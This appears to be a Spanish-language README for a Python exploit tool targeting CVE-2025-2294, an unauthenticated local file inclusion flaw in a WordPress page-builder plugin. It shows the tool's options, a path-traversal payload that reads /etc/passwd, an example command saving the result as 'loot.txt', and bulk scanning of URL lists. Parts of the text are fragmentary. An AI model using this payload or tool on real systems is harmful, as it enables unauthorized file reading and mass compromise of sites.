
CVE-2025-2294 afecta al plugin Kubio AI Page Builder para WordPress (versiones hasta la 2.5.1 inclusive). Presenta una vulnerabilidad de inclusión de archivos locales (LFI) sin autenticación a través de la función thekubio_hybrid_theme_load_template.
Esta vulnerabilidad permite a un atacante incluir y ejecutar archivos arbitrarios en el servidor WordPress vulnerable, lo que puede conducir a:
Este script en Python envía peticiones HTTP GET especialmente manipuladas al sitio WordPress vulnerable para verificar si es vulnerable al problema de inclusión de archivos locales.
/etc/passwd).usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
[--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
[--check] [--list LIST]
CVE-2025-2294 LFI Exploit
optional arguments:
-h, --help show this help message and exit
--url URL Target URL (e.g., http://127.0.0.1:8080)
--payload PAYLOAD
LFI payload path (default: ../../../../../../../../etc/passwd)
--save SAVE Save full response to file (optional)
--lines LINES Number of preview lines (default: 10)
--timeout TIMEOUT
Request timeout in seconds (default: 10)
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--check Check vulnerability status only, no saving or preview
--list LIST Path to file with list of URLs to check one by one
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"
Solicitud/Respuesta:
Esta herramienta está destinada únicamente para pruebas de seguridad autorizadas y fines de investigación. El uso no autorizado contra sistemas sin permiso es ilegal y poco ético.